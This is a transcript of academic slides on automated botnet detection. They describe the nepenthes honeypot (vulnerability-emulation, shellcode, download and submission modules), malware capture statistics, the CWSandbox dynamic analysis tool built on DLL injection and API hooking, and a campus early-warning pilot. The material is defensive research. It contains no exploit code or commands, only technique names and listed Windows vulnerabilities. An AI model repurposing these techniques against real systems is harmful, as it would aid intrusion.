Towards Automated Botnet Detection & Mitigation · Towards Automated Botnet Detection & Mitigation...
Transcript of Towards Automated Botnet Detection & Mitigation · Towards Automated Botnet Detection & Mitigation...
UNIVERSITÄT
Pi1 - Laboratory for Dependable Distributed Systems
MANNHEIM
Towards Automated Botnet Detection & Mitigation
Thorsten HolzLaboratory for Dependable Distributed Systems
Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems UNIVERSITÄTMANNHEIM
Outline
• Motivation
• Tools & techniques for botnet detection
• nepenthes / mwcollect
• CWSandbox
• Results
Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems UNIVERSITÄTMANNHEIM
Malware collection
• Hundreds of new malware each month
• How to learn more about malware?
• Quantitative & qualitative information
• Information about new malware
• Usage of honeypot-based techniques
• Use deception & emulation
Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems UNIVERSITÄTMANNHEIM
nepenthes
• Tool to automatically “collect” malware like bots and other autonomous spreading malware
• Emulate known vulnerabilities and download malware trying to exploit these vulnerabilities
• Available at http://nepenthes.mwcollect.org
Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems UNIVERSITÄTMANNHEIM
Schematic overview
Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems UNIVERSITÄTMANNHEIM
Vulnerability modules• Emulate vulnerable services
• Play with exploits until they send us their payload
• Currently more than 20 vulnerability modules available
• More in development
• Analysis of known vulnerabilities & exploits necessary
• More research needed: ScriptGen
Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems UNIVERSITÄTMANNHEIM
Vulnerability modules
• vuln_dcom (MS03-039)
• vuln_asn1 (MS04-007)
• vuln_lsass (MS04-011)
• vuln_wins (MS04-045)
• vuln_mssql/vuln_msdtc/vuln_msmq
• vuln_optix|kuang2|bagle|mydoom
• ...
Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems UNIVERSITÄTMANNHEIM
Shellcode modules
• sch_generic_xor
• Generic XOR decoder
• sch_generic_createprocess
• Generic CreateProcess
• sch_generic_url
• Generic URL
• sch_generic_cmd
Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems UNIVERSITÄTMANNHEIM
Download modules
• download_curl
• Use libcurl to download files
• download_ftp
• Replaces Windows FTP client
• download_tftp
• Implementation of TFTP
• download_csend|creceive
Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems UNIVERSITÄTMANNHEIM
Submission modules
• submit_file
• Write file to hard disk
• submit_mysql / _postgres
• Store file in database
• submit_norman
• Submit file to http://sandbox.norman.no
• submit_nepenthes
Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems UNIVERSITÄTMANNHEIM
Distributed setup
Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems UNIVERSITÄTMANNHEIM
mwcollect Alliance
https://alliance.mwcollect.org
Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems UNIVERSITÄTMANNHEIM
Statistics: nepenthes
• Four months nepenthes on /18 network:
• 50,000,000+ files downloaded
• 14,000+ unique binaries based on md5sum
• ~1,000 different botnets
• Anti-virus engines detect between 70% and 90% of the binaries
• Korgobot/Padobot dominates
Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems UNIVERSITÄTMANNHEIM
Results for /18
• In-/Outbound traffic and TCP connections
Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems UNIVERSITÄTMANNHEIM
Results for /18
• logged_downloads and logged_submissons
CWSandboxAutomatically analyzing a
collected binary
Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems UNIVERSITÄTMANNHEIM
Overview
• Automatic behaviour analysis
• Execute the binary and observe what it is doing
• Similar to Norman Sandbox
• Currently early beta version available
• Results look promising
• Currently unsure how / when to release it
Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems UNIVERSITÄTMANNHEIM
Schematic overview
• CWSandbox & CWMonitor.dll
Page 1 of 1
CWSandbox
1. Introduction
Nowadays a lot of malicious applications exist and due to the heavy usage of email and websurfing they distribute very fast and in an extensive way. In order to prevent the bad effects and to stop it’s further distribution those malware applications have to be analyzed. This normally is done by disassembling, which is very time intensive and sometimes very difficult. A different way is the automatic behaviour analysis, which is done by the CWsandbox. Within that dynamic analysis the malware is executed in a controlled environment. All of its actions are monitored, logged and can be blocked, if necessary. After execution of the malware an analysis is done on the collected data. This approach is dimensions faster than disassembling, can even be done by people withouth any programming skills and is able to deliver good results.
2. Architecture
The CWSandbox executes the malware and injects a CWMmonitor.dll into it and communicates with this DLL during the whole execution process. When the malware executes an other process or starts a windows service, the CWSandbox is informed before and injects another instance of the monitoring DLL into the new process, before this is started.
When enough information about the malware is collected or an adjustable timeout is reached, the CWSandbox terminates the malware application(s) and analyzes the collected data. In order to prevent harmful side effects, the malware can be terminated previously, when special conditions are detected, i.e. when more than 10 ICMP requests are made (in order to prevent DOS attacks). The monitoring and the analyzing steps are described in detail in the following two sections.
3. The monitoring
In Windows nearly all accesses to the system ressources are done via the Windows-API. The API offers functions to access the filesystem and the registry, to execute other applications or to install, start or stop Windows services. It also offers the “WinSock”-functions, which are normally used to communicate via TCP/ IP-networks, such as the internet. The API is implemented by different DLLs, located in the windows system directory.
Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems UNIVERSITÄTMANNHEIM
Inner working
• DLL injection and API hooking
• Hooking of API calls from kernel32.dll, ws2_32.dll, mswsock.dll, user32.dll, ...
• Tracing of functions for file access, process access, Winsock communication, registry, ...
• Execution for 3 minutes, then processing of results ➙ Analysis log
Putting it together...Towards automated botnet
detection & mitigation
Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems UNIVERSITÄTMANNHEIM
Conclusion
• Honeypot-based techniques can help us to learn more about autonomous spreading malware
• With the help of automated capture and analysis, we can efficiently detect botnets
• Local and global mitigation possible
• Needs more research, e.g., 0day-support
UNIVERSITÄT
Pi1 - Laboratory for Dependable Distributed Systems
MANNHEIM
Dipl. Inform. Thorsten Holzhttp://www-pi1.informatik.uni-mannheim.de/[email protected]
More information: http://honeyblog.org
Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems UNIVERSITÄTMANNHEIM
nepenthes: use case
• Usage of nepenthes as an early-warning system in pilot project together with University of Karlsruhe
• Listen on all unused IP addresses
• Only reachable from within campus network
• Detect infected machines
• Inform administrator
Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems UNIVERSITÄTMANNHEIM
nepenthes: use case
Thorsten Holz • Pi1 - Laboratory for Dependable Distributed Systems UNIVERSITÄTMANNHEIM
nepenthes: use case
• Within two months: detection of 28 infected machines within campus network
• Alternative to netflow-based techniques
• Low (no?) false positives
• Automated blocking of infected machines?
• Analysis of captured malware can help to protect other machines, e.g. blackhole C&C server